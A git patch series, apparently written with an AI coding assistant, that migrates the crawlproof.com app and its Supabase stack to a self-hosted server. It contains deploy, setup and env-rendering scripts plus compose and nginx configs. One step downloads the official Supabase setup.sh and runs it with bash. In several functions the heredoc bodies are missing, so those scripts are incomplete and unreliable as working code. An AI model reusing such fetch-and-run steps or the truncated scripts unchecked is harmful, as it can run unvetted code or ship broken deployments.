curl -fsS -m 5 -o /dev/null "http://127.0.0.1:${APP_PORT}/"; then return 0; fi + sleep 5 + done + return 1 +} + +case "${1:-}" in + --status) + compose ps + curl -fsS -m 5 -o /dev/null -w 'app http %{http_code} in %{time_total}s\n' "http://127.0.0.1:${APP_PORT}/" || echo "app not answering" + [ -f "$STATE" ] && cat "$STATE" + exit 0 + ;; + --rollback) + [ -f "$STATE" ] || die "no deploy state to roll back to" + # shellcheck disable=SC1090 + . "$STATE" + [ -n "${PREVIOUS_SHA:-}" ] || die "no PREVIOUS_SHA recorded" + log "Rolling back to $PREVIOUS_SHA" + exec "$0" "$PREVIOUS_SHA" + ;; +esac + +TARGET=${1:?usage: deploy-app.sh | --rollback | --status} + +[ -f "$ROOT/app.env" ] || die "missing $ROOT/app.env (the app's secrets)" +[ -f "$ROOT/deploy.env" ] || die "missing $ROOT/deploy.env (ports, build args)" + +CURRENT="" +[ -d "$APP_DIR/.git" ] && CURRENT=$(git -C "$APP_DIR" rev-parse HEAD 2>/dev/null || echo "") + +if [ ! -d "$APP_DIR/.git" ]; then + log "First deploy: cloning $REPO" + git clone --filter=blob:none "$REPO" "$APP_DIR" +fi + +log "Fetching $TARGET" +git -C "$APP_DIR" fetch --all --tags --prune +git -C "$APP_DIR" checkout --detach "$TARGET" +SHA=$(git -C "$APP_DIR" rev-parse HEAD) +log "At $SHA" + +log "Building" +compose build app + +log "Starting" +compose up -d + +if health; then + log "Healthy" + { + echo "DEPLOYED_SHA=$SHA" + echo "PREVIOUS_SHA=$CURRENT" + echo "DEPLOYED_AT=$(date -u +%FT%TZ)" + } > "$STATE" + compose ps +else + log "UNHEALTHY after ${HEALTH_TIMEOUT}s — last 60 lines:" + compose logs --tail 60 app || true + if [ -n "$CURRENT" ]; then + log "Restoring $CURRENT" + git -C "$APP_DIR" checkout --detach "$CURRENT" + compose build app && compose up -d + health && log "Restored to $CURRENT" || log "ROLLBACK ALSO UNHEALTHY — site is down" + fi + die "deploy of $SHA failed health check" +fi diff --git a/ops/selfhost/server/docker-compose.app.yml b/ops/selfhost/server/docker-compose.app.yml new file mode 100644 index 00000000..cb241d64 --- /dev/null +++ b/ops/selfhost/server/docker-compose.app.yml @@ -0,0 +1,69 @@ +# crawlproof.com on dev2 — the app container (Next.js + audit worker, both +# started by start.sh) and the Redis the prober queue needs. +# +# Lives at /home/anthony/www/crawlproof.com/docker-compose.app.yml. +# nginx on the host terminates TLS and proxies to 127.0.0.1:${APP_PORT}. +# +# The Supabase stack is a separate compose project in ./supabase; the app +# reaches it over the host's loopback gateway, not a shared compose network, +# so either side can be restarted without the other noticing. + +services: + app: + container_name: crawlproof-app + build: + context: ./app + dockerfile: Dockerfile + args: + # Next.js inlines NEXT_PUBLIC_* at build time, so these must be + # present for `next build`, not just at runtime. + NEXT_PUBLIC_SITE_URL: ${NEXT_PUBLIC_SITE_URL} + NEXT_PUBLIC_SUPABASE_URL: ${NEXT_PUBLIC_SUPABASE_URL} + NEXT_PUBLIC_SUPABASE_ANON_KEY: ${NEXT_PUBLIC_SUPABASE_ANON_KEY} + NEXT_SERVER_ACTIONS_ENCRYPTION_KEY: ${NEXT_SERVER_ACTIONS_ENCRYPTION_KEY} + restart: unless-stopped + env_file: + - ./app.env + environment: + PORT: 3000 + WORKER_PORT: 9080 + WORKER_URL: http://127.0.0.1:9080 + HOSTNAME: 0.0.0.0 + NODE_ENV: production + ports: + - "127.0.0.1:${APP_PORT:-3100}:3000" + extra_hosts: + # Lets the app reach the Supabase gateway and Redis on the host without + # putting both compose projects on one network. + - "host.docker.internal:host-gateway" + healthcheck: + test: ["CMD-SHELL", "node -e \"fetch('http://127.0.0.1:3000/').then(r=>process.exit(r.ok?0:1)).catch(()=>process.exit(1))\""] + interval: 30s + timeout: 10s + retries: 5 + start_period: 90s + logging: + driver: json-file + options: { max-size: "50m", max-file: "3" } + + redis: + container_name: crawlproof-redis + image: redis:7-alpine + restart: unless-stopped + command: ["redis-server", "--requirepass", "${REDIS_PASSWORD}", "--appendonly", "yes"] + volumes: + - ./volumes/redis:/data + ports: + # The app reaches it over the bridge; the prober droplet reaches it on + # the public port, which ufw opens only to that one address. + - "${REDIS_BIND:-127.0.0.1}:${REDIS_PORT:-6379}:6379" + healthcheck: + test: ["CMD-SHELL", "redis-cli -a \"$$REDIS_PASSWORD\" ping | grep -q PONG"] + interval: 30s + timeout: 5s + retries: 5 + environment: + REDIS_PASSWORD: ${REDIS_PASSWORD} + logging: + driver: json-file + options: { max-size: "50m", max-file: "3" } diff --git a/ops/selfhost/server/nginx-crawlproof.conf b/ops/selfhost/server/nginx-crawlproof.conf new file mode 100644 index 00000000..6f30dd0f --- /dev/null +++ b/ops/selfhost/server/nginx-crawlproof.conf @@ -0,0 +1,82 @@ +# crawlproof.com on dev2 — nginx terminates TLS for the app and for the +# Supabase gateway. Install at /etc/nginx/sites-available/crawlproof.com and +# symlink into sites-enabled. +# +# certbot --nginx manages the ssl_certificate lines; this file is written +# HTTP-only on purpose so `certbot --nginx -d ...` can add TLS itself and own +# the renewal. Run it once per server_name group. + +# sites-available files are included at http scope, so the map belongs here +# rather than in a separate conf.d snippet someone has to remember to add. +# Without it $connection_upgrade is empty and every websocket 400s. +map $http_upgrade $connection_upgrade { + default upgrade; + '' close; +} + +# ---------------------------------------------------------------- the app +server { + listen 80; + listen [::]:80; + server_name crawlproof.com www.crawlproof.com; + + # Ad creatives and audit PDFs both post bodies well over the 1m default. + client_max_body_size 50m; + + # The tracker hashes the client IP and geolocates it, so the real address + # has to survive the proxy hop or every hit looks like it came from + # 127.0.0.1 and lands in one geo bucket. + real_ip_header X-Forwarded-For; + + access_log /var/log/nginx/crawlproof.access.log; + error_log /var/log/nginx/crawlproof.error.log; + + location / { + proxy_pass http://127.0.0.1:3100; + proxy_http_version 1.1; + proxy_set_header Host $host; + proxy_set_header X-Real-IP $remote_addr; + proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; + proxy_set_header X-Forwarded-Proto $scheme; + proxy_set_header X-Forwarded-Host $host; + proxy_set_header Upgrade $http_upgrade; + proxy_set_header Connection $connection_upgrade; + + # Audits render pages in Chromium and can legitimately take minutes. + proxy_connect_timeout 15s; + proxy_send_timeout 300s; + proxy_read_timeout 300s; + proxy_buffering off; + } +} + +# ---------------------------------------------------- the supabase gateway +server { + listen 80; + listen [::]:80; + server_name supabase.crawlproof.com; + + # Storage uploads go through here; 9.8 GB of objects arrive this way + # during the migration and ad assets after it. + client_max_body_size 512m; + + access_log /var/log/nginx/supabase-crawlproof.access.log; + error_log /var/log/nginx/supabase-crawlproof.error.log; + + location / { + proxy_pass http://127.0.0.1:8000; + proxy_http_version 1.1; + proxy_set_header Host $host; + proxy_set_header X-Real-IP $remote_addr; + proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; + proxy_set_header X-Forwarded-Proto $scheme; + proxy_set_header Upgrade $http_upgrade; + proxy_set_header Connection $connection_upgrade; + + # Realtime holds websockets open for promo_list / promo_post. + proxy_connect_timeout 15s; + proxy_send_timeout 3600s; + proxy_read_timeout 3600s; + proxy_buffering off; + } +} diff --git a/ops/selfhost/server/setup-supabase.sh b/ops/selfhost/server/setup-supabase.sh new file mode 100755 index 00000000..f54e0960 --- /dev/null +++ b/ops/selfhost/server/setup-supabase.sh @@ -0,0 +1,409 @@ +#!/usr/bin/env bash +# +# Stand up self-hosted Supabase for crawlproof.com on dev2. +# Run as root ON THE APP SERVER. Idempotent: a second run keeps the generated +# secrets, certificate and data, and only rewrites the crawlproof overlay +# (tuning, pg_hba, compose override) before restarting the stack. +# +# Adapted from profullstack/niche-db ops/selfhost-supabase. Two deliberate +# differences, both because crawlproof is a Supabase *application* and nichedb +# was only ever a Postgres box: +# +# 1. No lock_down_public. crawlproof talks to PostgREST with the anon and +# authenticated roles and guards its rows with RLS, so revoking those +# grants would take the whole app offline. +# 2. No Caddy. dev2 already terminates TLS with nginx + certbot for every +# other vhost, so the gateway is published on loopback and nginx proxies +# to it. Running Caddy here would fight nginx for :80 and :443. +# +# What it does: +# 1. System: base packages, Docker log rotation, ufw (ssh + 80/443 + Postgres) +# 2. Supabase: official setup.sh at a pinned self-hosted release tag +# 3. .env: public URLs, SMTP, compose overrides +# 4. Postgres: self-signed TLS cert, pg_hba that only lets `postgres` in from +# outside and only over TLS, tuning sized from this box's RAM and CPUs +# 5. Start the stack and create the extensions crawlproof's schema needs +# 6. Write crawlproof-connection.env (0600) with the app's keys +# +# Knobs (environment variables): +# SUPABASE_REF self-hosted/v0.8.2 pinned release of supabase/docker +# INSTALL_ROOT /home/anthony/www/crawlproof.com +# PROJECT supabase project directory name +# DB_DOMAIN db.crawlproof.com Postgres host name (cert SAN) +# STUDIO_DOMAIN supabase.crawlproof.com +# SITE_URL https://crawlproof.com +# DB_PORT 5432 public Postgres port on the host +# KONG_HTTP_PORT 8000 published on loopback only +# SMTP_* GoTrue outbound mail (Resend) +# SKIP_SYSTEM 0 1 = no apt/ufw/docker +# +set -euo pipefail + +SUPABASE_REF=${SUPABASE_REF:-self-hosted/v0.8.2} +INSTALL_ROOT=${INSTALL_ROOT:-/home/anthony/www/crawlproof.com} +PROJECT=${PROJECT:-supabase} +DB_DOMAIN=${DB_DOMAIN:-db.crawlproof.com} +STUDIO_DOMAIN=${STUDIO_DOMAIN:-supabase.crawlproof.com} +SITE_URL=${SITE_URL:-https://crawlproof.com} +DB_PORT=${DB_PORT:-5432} +KONG_HTTP_PORT=${KONG_HTTP_PORT:-8000} +SMTP_HOST=${SMTP_HOST:-smtp.resend.com} +SMTP_PORT=${SMTP_PORT:-465} +SMTP_USER=${SMTP_USER:-resend} +SMTP_PASS=${SMTP_PASS:-} +SMTP_SENDER_NAME=${SMTP_SENDER_NAME:-CrawlProof} +SMTP_ADMIN_EMAIL=${SMTP_ADMIN_EMAIL:-support@crawlproof.com} +# Fixed subnet for the compose network, so pg_hba can tell the gateway (where +# Docker's userland proxy makes outside clients appear) from real services. +DOCKER_SUBNET=${DOCKER_SUBNET:-172.31.251.0/24} +DOCKER_GATEWAY=${DOCKER_GATEWAY:-172.31.251.1} +SKIP_SYSTEM=${SKIP_SYSTEM:-0} + +DIR="$INSTALL_ROOT/$PROJECT" +PG_UID=100 # postgres inside supabase/postgres:17.6.1.x +PG_GID=101 + +log() { printf '\n===> %s\n' "$*"; } +warn() { printf 'WARNING: %s\n' "$*" >&2; } +die() { printf 'ERROR: %s\n' "$*" >&2; exit 1; } + +[ "$SKIP_SYSTEM" = 1 ] || [ "$(id -u)" = 0 ] || die "run as root (or SKIP_SYSTEM=1 for a rehearsal)" + +backup() { # never overwrite without a numbered copy beside the original + local f=$1 n=1 dir name base ext + [ -e "$f" ] || return 0 + dir=$(dirname "$f") + name=$(basename "$f") + if [[ "${name#.}" == *.* ]]; then base=${name%.*} ext=".${name##*.}"; else base=$name ext=""; fi + while [ -e "$dir/$base.bak-$(printf %03d $n)$ext" ]; do n=$((n + 1)); done + cp -a "$f" "$dir/$base.bak-$(printf %03d $n)$ext" +} + +ssh_ports() { + ss -ltnpH 2>/dev/null | awk '/"sshd"/ {n=split($4,a,":"); print a[n]}' | sort -u +} + +# ---------------------------------------------------------------- 1. system +system_setup() { + log "Base packages" + export DEBIAN_FRONTEND=noninteractive + apt-get update -qq + apt-get install -qq -y curl ca-certificates openssl jq ufw >/dev/null + + log "Docker log rotation" + mkdir -p /etc/docker + if [ ! -s /etc/docker/daemon.json ]; then + printf '{\n "log-driver": "json-file",\n "log-opts": { "max-size": "50m", "max-file": "3" }\n}\n' > /etc/docker/daemon.json + systemctl reload docker 2>/dev/null || true + elif ! grep -q max-size /etc/docker/daemon.json; then + warn "/etc/docker/daemon.json exists without log rotation; left untouched" + fi + + log "Firewall" + local p ports + ports=$(ssh_ports) + [ -n "$ports" ] || ports=22 + for p in $ports; do ufw allow "$p/tcp" >/dev/null; done + ufw allow "$DB_PORT/tcp" >/dev/null + ufw allow 80/tcp >/dev/null + ufw allow 443/tcp >/dev/null + ufw --force enable >/dev/null + # Docker publishes ports through its own iptables chains, ahead of ufw, so + # the rules above document intent; the real gate for 5432 is pg_hba + TLS. + ufw status | sed 's/^/ /' +} + +# ------------------------------------------------------------- 2. supabase +supabase_setup() { + mkdir -p "$INSTALL_ROOT" + if [ -f "$DIR/.env" ] && [ -f "$DIR/docker-compose.yml" ]; then + log "Supabase project already at $DIR; keeping its secrets" + return + fi + log "Supabase $SUPABASE_REF into $DIR" + local tmp + tmp=$(mktemp -d) + curl -fsSL "https://raw.githubusercontent.com/supabase/supabase/$SUPABASE_REF/docker/setup.sh" -o "$tmp/setup.sh" + local flags=(--ref "$SUPABASE_REF" -p "$PROJECT" -y) + [ "$SKIP_SYSTEM" = 1 ] && flags+=(--skip-deps) + # setup.sh prints every generated secret; keep that off the terminal (and + # out of whatever ssh session is watching) in a root-only log instead. + local slog="$INSTALL_ROOT/$PROJECT-setup.log" + (umask 077 && : > "$slog") + if ! (cd "$INSTALL_ROOT" && bash "$tmp/setup.sh" "${flags[@]}") >> "$slog" 2>&1; then + grep -E '^(===>|ERROR|WARNING)' "$slog" | tail -n 20 >&2 + die "Supabase setup.sh failed; full log (contains secrets): $slog" + fi + grep -E '^===>' "$slog" | grep -v -i 'key\|secret' | sed 's/^/ /' || true + rm -rf "$tmp" +} + +set_env() { # set_env KEY VALUE -> replace or append in $DIR/.env + local k=$1 v=$2 + if grep -q "^$k=" "$DIR/.env"; then + # Rewrite with awk, not sed: these values carry /, |, & and + freely and + # every sed delimiter would eventually collide with one of them. + awk -v k="$k" -v v="$v" 'BEGIN{FS="="} $1==k {print k "=" v; next} {print}' "$DIR/.env" > "$DIR/.env.tmp" + mv "$DIR/.env.tmp" "$DIR/.env" + else + printf '%s=%s\n' "$k" "$v" >> "$DIR/.env" + fi +} +get_env() { grep "^$1=" "$DIR/.env" | head -n1 | cut -d= -f2-; } + +configure_env() { + log "Configuring .env" + backup "$DIR/.env" + set_env SUPABASE_PUBLIC_URL "https://$STUDIO_DOMAIN" + set_env API_EXTERNAL_URL "https://$STUDIO_DOMAIN" + set_env SITE_URL "$SITE_URL" + set_env ADDITIONAL_REDIRECT_URLS "${SITE_URL}/**,https://www.crawlproof.com/**" + set_env POOLER_TENANT_ID crawlproof + set_env STUDIO_DEFAULT_ORGANIZATION "Profullstack" + set_env STUDIO_DEFAULT_PROJECT "crawlproof" + set_env API_GW_HTTP_PORT "$KONG_HTTP_PORT" + set_env KONG_HTTP_PORT "$KONG_HTTP_PORT" + # crawlproof signs its own users up through GoTrue; keep signup on and keep + # confirmation required (the cloud project confirmed 94 of 113). + set_env DISABLE_SIGNUP false + set_env ENABLE_ANONYMOUS_USERS false + set_env ENABLE_EMAIL_SIGNUP true + set_env ENABLE_EMAIL_AUTOCONFIRM false + if [ -n "$SMTP_PASS" ]; then + set_env SMTP_HOST "$SMTP_HOST" + set_env SMTP_PORT "$SMTP_PORT" + set_env SMTP_USER "$SMTP_USER" + set_env SMTP_PASS "$SMTP_PASS" + set_env SMTP_SENDER_NAME "$SMTP_SENDER_NAME" + set_env SMTP_ADMIN_EMAIL "$SMTP_ADMIN_EMAIL" + else + warn "SMTP_PASS not set; GoTrue cannot send magic links until it is" + fi + set_env COMPOSE_FILE "docker-compose.yml:docker-compose.crawlproof.yml" + chmod 600 "$DIR/.env" +} + +# --------------------------------------------------------------- 4. postgres +detect_resources() { + MEM_MB=${MEM_MB:-$(awk '/MemTotal/ {print int($2/1024)}' /proc/meminfo)} + CPUS=${CPUS:-$(nproc)} +} + +write_tls() { + local tls="$DIR/volumes/crawlproof/tls" + mkdir -p "$tls" + if [ ! -s "$tls/server.key" ]; then + log "Self-signed TLS certificate for $DB_DOMAIN (10 years)" + openssl req -x509 -nodes -newkey ec -pkeyopt ec_paramgen_curve:prime256v1 \ + -days 3650 -subj "/CN=$DB_DOMAIN" -addext "subjectAltName=DNS:$DB_DOMAIN" \ + -keyout "$tls/server.key" -out "$tls/server.crt" 2>/dev/null + fi + chmod 600 "$tls/server.key" + chmod 644 "$tls/server.crt" + chown "$PG_UID:$PG_GID" "$tls/server.key" "$tls/server.crt" +} + +write_pg_hba() { + cat > "$DIR/volumes/crawlproof/pg_hba.conf" < "$DIR/volumes/crawlproof/crawlproof.conf" < "$DIR/docker-compose.crawlproof.yml" +} + +# ------------------------------------------------------------------ 5. start +compose() { (cd "$DIR" && docker compose "$@"); } + +start_stack() { + log "Starting the stack" + compose up -d --wait || compose up -d + # A config change on an already-running db needs a restart to take effect. + compose restart db >/dev/null + + local i + for i in $(seq 1 90); do + docker exec supabase-db pg_isready -U postgres -h localhost >/dev/null 2>&1 && break + sleep 2 + done +} + +sql_admin() { docker exec -i supabase-db psql -U supabase_admin -h localhost -d postgres -v ON_ERROR_STOP=1 -X -q -At "$@"; } + +create_extensions() { + # crawlproof's schema depends on all of these; pg_cron and pg_net drive the + # 10 scheduled jobs that call back into the app. + log "Extensions crawlproof needs" + sql_admin <<'EOF' +create extension if not exists "uuid-ossp" with schema extensions; +create extension if not exists pgcrypto with schema extensions; +create extension if not exists pg_stat_statements with schema extensions; +create extension if not exists vector with schema public; +create extension if not exists pg_net with schema extensions; +create extension if not exists pg_cron; +grant usage on schema cron to postgres; +grant all privileges on all tables in schema cron to postgres; +EOF + sql_admin -c "select string_agg(extname,', ' order by extname) from pg_extension" +} + +check_postgres() { + log "Checks" + sql_admin -c "select 'ssl='||current_setting('ssl')||' shared_buffers='||current_setting('shared_buffers')||' hba='||current_setting('hba_file')||' version='||current_setting('server_version')" + # The opposite of nichedb: PostgREST must still be able to reach public. + local anon + anon=$(sql_admin -c "select has_schema_privilege('anon','public','usage')") + [ "$anon" = t ] || die "anon lost USAGE on schema public — PostgREST would 401 every request" + echo "anon can use schema public (correct for crawlproof)" + df -h "$DIR/volumes/db/data" 2>/dev/null | tail -1 | awk '{print "data disk: "$4" free of "$2}' +} + +write_connection() { + local pw + pw=$(get_env POSTGRES_PASSWORD) + umask 077 + cat > "$DIR/crawlproof-connection.env" < Date: Thu, 24 Sep 2026 19:15:22 +0000 Subject: [PATCH 02/10] ops: exclude the service migration ledgers from the data dump storage.migrations and auth.schema_migrations are how the Storage and GoTrue services record which of their own schema migrations have run. Loading the cloud project's rows makes the self-hosted services believe they have already applied migrations their images have not, and they skip them silently. Also adds render-app-env.mjs, which merges the Railway export with the self-hosted Supabase keys and the handful of values that must change because the host changed (Supabase URL and keys, REDIS_URL off redis.railway.internal). It drops the 56 RAILWAY_SERVICE_*_URL entries Railway injects from the shared project, which mean nothing off Railway. Co-Authored-By: Claude Opus 5 (1M context) --- ops/selfhost/migrate/pull-cloud.sh | 18 ++-- ops/selfhost/server/render-app-env.mjs | 114 +++++++++++++++++++++++++ 2 files changed, 127 insertions(+), 5 deletions(-) create mode 100644 ops/selfhost/server/render-app-env.mjs diff --git a/ops/selfhost/migrate/pull-cloud.sh b/ops/selfhost/migrate/pull-cloud.sh index 296a255a..807ecb10 100755 --- a/ops/selfhost/migrate/pull-cloud.sh +++ b/ops/selfhost/migrate/pull-cloud.sh @@ -51,14 +51,22 @@ pgdump --dbname="$CLOUD_DB_URL" \ --disable-triggers \ --schema=auth --schema=public --schema=storage \ --exclude-table-data='storage.objects' \ + --exclude-table-data='storage.migrations' \ + --exclude-table-data='auth.schema_migrations' \ --exclude-table-data='public.tracker_events' \ > "$OUT/data.sql" -# storage.objects is deliberately excluded: sync-storage.mjs re-uploads the -# files through the Storage API, which writes those rows itself. Importing the -# cloud rows as well would leave metadata pointing at files the self-hosted -# backend has never heard of. -# tracker_events is excluded because it is raw and pruned at 24h anyway. +# Four exclusions, each for its own reason: +# +# storage.objects sync-storage.mjs re-uploads the files through the +# Storage API, which writes these rows itself. Importing +# the cloud's copy as well would leave metadata pointing +# at files the self-hosted backend has never heard of. +# storage.migrations the storage service's own schema-version ledger. Load +# auth.schema_migrations the cloud's rows and the self-hosted service believes +# it has already run migrations that its images have not, +# and silently skips them. +# public.tracker_events raw hit log, pruned at 24h, worth nothing after a move. log "pg_cron jobs (not in a schema dump; they live in the cron schema)" docker run --rm -i "$PG_IMAGE" psql "$CLOUD_DB_URL" -At -X -v ON_ERROR_STOP=1 \ diff --git a/ops/selfhost/server/render-app-env.mjs b/ops/selfhost/server/render-app-env.mjs new file mode 100644 index 00000000..c9217144 --- /dev/null +++ b/ops/selfhost/server/render-app-env.mjs @@ -0,0 +1,114 @@ +#!/usr/bin/env node +// +// Build /home/anthony/www/crawlproof.com/app.env from three inputs: +// +// 1. the Railway export (every app secret as it runs today) +// 2. crawlproof-connection.env (the self-hosted Supabase keys) +// 3. the overrides below (what has to change because the host changed) +// +// Run on dev2. Writes 0600. The Railway export is the only thing that has to +// be copied onto the box, and it should be deleted once this has run. +// +// Usage: +// node render-app-env.mjs [--out /path/app.env] [--print] +// +// --print lists the keys and where each value came from, never the values. + +import { readFileSync, writeFileSync } from 'node:fs'; + +const args = process.argv.slice(2); +const varsFile = args.find((a) => !a.startsWith('--')); +const outIdx = args.indexOf('--out'); +const OUT = outIdx >= 0 ? args[outIdx + 1] : '/home/anthony/www/crawlproof.com/app.env'; +const CONN = process.env.CONN_ENV || '/home/anthony/www/crawlproof.com/supabase/crawlproof-connection.env'; +const printOnly = args.includes('--print'); + +if (!varsFile) { + console.error('usage: render-app-env.mjs [--out path] [--print]'); + process.exit(1); +} + +// ---- 1. Railway export. Accepts either the raw GraphQL response or a +// plain {KEY: value} object, so it works with `railway variables +// --json` as well as an API dump. +const raw = JSON.parse(readFileSync(varsFile, 'utf8')); +const railway = raw?.data?.variables ?? raw; + +// Railway injects one RAILWAY_SERVICE__URL for every service in the +// shared project (56 of them here) plus its own metadata. None of it means +// anything off Railway. +const railwayNoise = /^RAILWAY_/; + +// ---- 2. the self-hosted Supabase keys +function parseEnvFile(path) { + const out = {}; + for (const line of readFileSync(path, 'utf8').split('\n')) { + const m = line.match(/^([A-Za-z_][A-Za-z0-9_]*)=(.*)$/); + if (m) out[m[1]] = m[2]; + } + return out; +} +const conn = parseEnvFile(CONN); + +for (const k of ['NEXT_PUBLIC_SUPABASE_URL', 'NEXT_PUBLIC_SUPABASE_ANON_KEY', 'SUPABASE_SERVICE_ROLE_KEY']) { + if (!conn[k]) { + console.error(`ERROR: ${CONN} has no ${k} — run setup-supabase.sh first`); + process.exit(1); + } +} + +// ---- 3. what changes because the host changed +const REDIS_PASSWORD = process.env.REDIS_PASSWORD || ''; +if (!REDIS_PASSWORD) { + console.error('ERROR: set REDIS_PASSWORD (the same one docker-compose.app.yml uses)'); + process.exit(1); +} + +const overrides = { + // Supabase now answers on our own gateway. + NEXT_PUBLIC_SUPABASE_URL: conn.NEXT_PUBLIC_SUPABASE_URL, + NEXT_PUBLIC_SUPABASE_ANON_KEY: conn.NEXT_PUBLIC_SUPABASE_ANON_KEY, + SUPABASE_SERVICE_ROLE_KEY: conn.SUPABASE_SERVICE_ROLE_KEY, + SUPABASE_DB_PASSWORD: conn.SELFHOST_POSTGRES_PASSWORD, + + // Redis moved off redis.railway.internal. The app reaches it through the + // host gateway because the app and the Supabase stack are separate compose + // projects and are deliberately not on one network. + REDIS_URL: `redis://default:${REDIS_PASSWORD}@host.docker.internal:6379`, + + // The worker still runs beside the app inside the same container. + WORKER_URL: 'http://127.0.0.1:9080', + WORKER_PORT: '9080', + + NEXT_PUBLIC_SITE_URL: 'https://crawlproof.com', +}; + +const merged = {}; +for (const [k, v] of Object.entries(railway)) { + if (railwayNoise.test(k)) continue; + merged[k] = v; +} +const source = {}; +for (const k of Object.keys(merged)) source[k] = 'railway'; +for (const [k, v] of Object.entries(overrides)) { + source[k] = k in merged ? 'override (was railway)' : 'override (new)'; + merged[k] = v; +} + +if (printOnly) { + const keys = Object.keys(merged).sort(); + console.log(`${keys.length} keys\n`); + for (const k of keys) console.log(` ${k.padEnd(38)} ${source[k]}`); + process.exit(0); +} + +const body = Object.keys(merged) + .sort() + .map((k) => `${k}=${merged[k]}`) + .join('\n'); + +writeFileSync(OUT, `# crawlproof app env, rendered by render-app-env.mjs on ${new Date().toISOString()}\n${body}\n`, { + mode: 0o600, +}); +console.log(`wrote ${OUT} with ${Object.keys(merged).length} keys`); +console.log(`overridden: ${Object.keys(overrides).join(', ')}`); From fded77fb2ace8b15ddc309d7797ad35a7d8e37e3 Mon Sep 17 00:00:00 2001 From: Anthony Ettinger Date: Thu, 24 Sep 2026 19:19:48 +0000 Subject: [PATCH 03/10] ops: count cron statement starts, not matching lines Job bodies are multi-line and one of them mentions cron.schedule itself, so the manifest reported 11 jobs for 10. Co-Authored-By: Claude Opus 5 (1M context) --- ops/selfhost/migrate/pull-cloud.sh | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/ops/selfhost/migrate/pull-cloud.sh b/ops/selfhost/migrate/pull-cloud.sh index 807ecb10..11fe1f1a 100755 --- a/ops/selfhost/migrate/pull-cloud.sh +++ b/ops/selfhost/migrate/pull-cloud.sh @@ -93,7 +93,9 @@ docker run --rm -i "$PG_IMAGE" psql "$CLOUD_DB_URL" -At -F$'\t' -X -v ON_ERROR_S echo "schema_bytes=$(stat -c%s "$OUT/schema.sql")" echo "data_bytes=$(stat -c%s "$OUT/data.sql")" echo "storage_objects=$(wc -l < "$OUT/storage-inventory.tsv")" - echo "cron_jobs=$(grep -c cron.schedule "$OUT/cron-jobs.sql" || true)" + # Job bodies are multi-line and at least one mentions cron.schedule itself, + # so count statement starts, not matching lines. + echo "cron_jobs=$(grep -c '^select cron.schedule' "$OUT/cron-jobs.sql" || true)" } > "$OUT/MANIFEST" log "Done: $OUT" From ca647936c605ddeb89fd42fa453407a97ba25c66 Mon Sep 17 00:00:00 2001 From: Anthony Ettinger Date: Thu, 24 Sep 2026 19:47:37 +0000 Subject: [PATCH 04/10] ops: repair the v0.8.2 bootstrap gaps, and target master not main Four things self-hosted/v0.8.2 leaves in a state its own services cannot start from, all hit on a clean initdb and all now repaired idempotently by setup-supabase.sh: - service role passwords do not match POSTGRES_PASSWORD, so PostgREST, GoTrue and Storage crashloop on "password authentication failed" - auth.uid() is owned by supabase_admin while GoTrue migrates as supabase_auth_admin, so its create-or-replace fails "must be owner of function uid" - graphql_public is missing, and PostgREST is configured with db-schemas=public,graphql_public, so it builds no schema cache and 403s - _realtime is missing, and Realtime sets search_path to it, then dies with "no schema has been selected to create in" Branch: this repo's default is master. deploy-dev2.yml watched main and would never have fired. deploy-app.sh now resolves origin/ to a sha first, because `git checkout --detach ` reports only "--detach does not take a path argument". load-selfhost.sh: grep -m1 instead of `grep | head -1`, which under pipefail gave grep a SIGPIPE and left "30\n0" in a variable used numerically; quote the bucket boolean, which psql prints as bare t/f; add --post-only to re-run the idempotent tail after a mid-load failure without duplicating rows. Co-Authored-By: Claude Opus 5 (1M context) --- .github/workflows/deploy-dev2.yml | 4 +- ops/selfhost/README.md | 7 ++- ops/selfhost/migrate/load-selfhost.sh | 48 +++++++++++------ ops/selfhost/migrate/pull-cloud.sh | 9 +++- ops/selfhost/server/deploy-app.sh | 12 ++++- ops/selfhost/server/setup-supabase.sh | 74 +++++++++++++++++++++++++++ 6 files changed, 130 insertions(+), 24 deletions(-) diff --git a/.github/workflows/deploy-dev2.yml b/.github/workflows/deploy-dev2.yml index 6a8a4ab7..be2562ce 100644 --- a/.github/workflows/deploy-dev2.yml +++ b/.github/workflows/deploy-dev2.yml @@ -15,7 +15,9 @@ name: Deploy to dev2 on: push: - branches: [main] + # master, not main — this repo's default branch is master, and a workflow + # watching main would simply never fire. + branches: [master] workflow_dispatch: inputs: ref: diff --git a/ops/selfhost/README.md b/ops/selfhost/README.md index e32c8c30..54b0ee68 100644 --- a/ops/selfhost/README.md +++ b/ops/selfhost/README.md @@ -143,5 +143,8 @@ nmap prober as a BullMQ consumer. It connects **outbound** to Redis using the that secret has to be repointed at dev2, and ufw opened to that one address — the Redis port is on loopback by default. -Note that `deploy-prober.yml` triggers on pushes to `master` while this repo's -default branch is `main`, so it has probably not fired in a long time. +This repo's default branch is **`master`**, not `main`. `deploy-prober.yml` and +`deploy-dev2.yml` both watch `master` for that reason, and `deploy-app.sh` +resolves a ref through `origin/` before checking it out, because a bare +branch name that does not exist locally fails with the thoroughly unhelpful +"git checkout: --detach does not take a path argument". diff --git a/ops/selfhost/migrate/load-selfhost.sh b/ops/selfhost/migrate/load-selfhost.sh index 560fb963..eb47819d 100755 --- a/ops/selfhost/migrate/load-selfhost.sh +++ b/ops/selfhost/migrate/load-selfhost.sh @@ -10,7 +10,14 @@ # set -euo pipefail -DUMP=${1:?usage: load-selfhost.sh } +DUMP=${1:?usage: load-selfhost.sh [--post-only]} + +# --post-only re-runs everything AFTER the data load: buckets, the URL +# rewrite, the realtime publication and the cron jobs. Those steps are all +# idempotent; the schema and data steps are NOT (a second COPY duplicates +# rows), so this is the safe way back in after a failure part-way through. +POST_ONLY=0 +[ "${2:-}" = "--post-only" ] && POST_ONLY=1 DIR=${DIR:-/home/anthony/www/crawlproof.com/supabase} CLOUD_REF=${CLOUD_REF:-ywcizjsgrcmhgyplldac} NEW_HOST=${NEW_HOST:-supabase.crawlproof.com} @@ -31,24 +38,20 @@ docker exec supabase-db pg_isready -U postgres -h localhost >/dev/null 2>&1 || d log "Snapshot BEFORE (so a silent partial load cannot look like success)" psql_strict -At -c "select 'tables='||(select count(*) from information_schema.tables where table_schema='public')||' users='||(select count(*) from auth.users)" +if [ "$POST_ONLY" = 0 ]; then # ---------------------------------------------------------------- schema -# The self-hosted stack ships its own auth/storage schemas, already at the -# right version for the images that are running. Replaying the cloud's copy -# over them fights the service migrations, so only public comes from the dump -# and auth/storage contribute rows alone. -log "Schema: public only (auth and storage 